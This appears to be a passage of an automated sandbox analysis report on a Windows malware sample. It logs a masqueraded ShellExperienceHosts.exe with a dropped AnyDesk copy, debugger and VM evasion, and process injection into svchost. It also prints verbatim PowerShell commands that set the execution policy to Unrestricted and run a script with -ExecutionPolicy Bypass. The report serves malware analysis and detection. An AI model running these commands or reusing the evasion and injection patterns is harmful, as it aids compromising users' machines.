Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Window / User API: threadDelayed 6201	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3432	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6688	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2571	Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll			Jump to dropped file
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Dropped PE file which has not been started: C:\Users\Public\Bulete\AnyDesk.exe			Jump to dropped file

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep			graph_3-101691
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_3-101690

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 3168	Thread sleep time: -73000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 3492	Thread sleep time: -63000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 928	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 6892	Thread sleep count: 324 > 30	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 2228	Thread sleep count: 6201 > 30	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 2228	Thread sleep time: -62010s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4504	Thread sleep count: 265 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep count: 3432 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720	Thread sleep count: 6688 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1696	Thread sleep count: 2571 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2328	Thread sleep count: 267 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 1068	Thread sleep count: 266 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6244	Thread sleep count: 203 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Last function: Thread delayed
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Thread sleep count: Count: 6201 delay: -10

Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_6C9E410B __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

3_2_6C9E410B

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

3_2_032D80F0

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D5430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,

3_2_032D5430

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Thread delayed: delay time: 73000	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: PKHDJwnF0I.exe	Binary or memory string: Hyper-V enabled!UEFI Secure Variables (VbsPolicy)
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: PKHDJwnF0I.exe	Binary or memory string: Hyper-V not available
Source: PKHDJwnF0I.exe	Binary or memory string: Hyper-V Hypervisor running: %i
Source: PKHDJwnF0I.exe	Binary or memory string: XThe system has not the required hardware support (SLAT, VMX, ...) to run the Hypervisor.#Hyper-V hypervisor is not running.
Source: ShellExperienceHosts.exe, 00000003.00000002.3534659204.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: PKHDJwnF0I.exe	Binary or memory string: Hyper-V not started
Source: ShellExperienceHosts.exe, 00000003.00000002.3534659204.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

API call chain: ExitProcess graph end node

graph_3-101270

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_032DF00A

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032E054D VirtualProtect ?,-00000001,00000104,?

3_2_032E054D

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D7490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,

3_2_032D7490

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B90AE4 mov eax, dword ptr fs:[00000030h]		3_2_02B90AE4
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C300CD mov eax, dword ptr fs:[00000030h]		3_2_02C300CD

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D6790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,

3_2_032D6790

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032DDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,	3_2_032DDF10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032DF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_032DF00A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032E1F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_032E1F67
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAFFD7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CAFFD7C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAF5B5D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CAF5B5D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAF53A5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CAF53A5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_10006815
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10008587
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B967EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02B967EC

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1

Contains functionality to inject code into remote processes

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,

3_2_032D77E0

Contains functionality to inject threads in other processes

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

3_2_032D77E0

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe		3_2_032D77E0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe		3_2_032D77E0

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: ShellExperienceHosts.exe, 00000003.00000003.2813277197.0000000004471000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2650603870.0000000004471000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.3140566966.0000000004471000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0 minProgram Manager
Source: ShellExperienceHosts.exe, 00000003.00000002.3535848822.0000000004471000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inProgram Manager

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,	3_2_032D5430
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6CB1C89B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,	3_2_6CB1C9A1
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6CB1CA77
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: EnumSystemLocalesW,	3_2_6CB1C494
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_6CB1C51F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,	3_2_6CB1C772
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_6CB1C102
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: EnumSystemLocalesW,	3_2_6CB1C3AE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: EnumSystemLocalesW,	3_2_6CB1C3F9
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,	3_2_6CB1C307
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,	3_2_6C9D4365
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: GetLocaleInfoW,	3_2_6CB11E51
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: EnumSystemLocalesW,	3_2_6CB118E5

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
